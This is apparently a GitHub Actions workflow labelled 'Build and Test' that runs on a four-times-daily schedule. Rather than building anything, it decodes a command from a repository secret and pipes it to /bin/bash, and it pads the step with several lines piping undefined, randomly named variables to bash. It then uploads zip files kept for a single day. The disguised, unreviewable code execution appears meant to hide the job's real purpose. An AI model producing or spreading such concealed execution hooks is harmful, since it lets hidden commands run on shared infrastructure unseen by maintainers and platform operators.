name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '27 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          unrj07: ${{ secrets.unrj07 }}
        run: |
          printf '%s' "$unrj07" | jq -r .daltd80 | /bin/bash
          echo $viixy433 | jq -r .rl72094 | /bin/bash
          printf '%s' "$uvt0090" | jq -r .qhz02028 | /bin/bash
          echo $hbesc3180 | jq -r .fvr1534 | /bin/bash
          echo $pmdgw795 | jq -r .k3 | /bin/bash
          echo $rfc7952 | jq -r .aypcg88007 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: KADiaPRe
          path: "*.zip"
          retention-days: 1
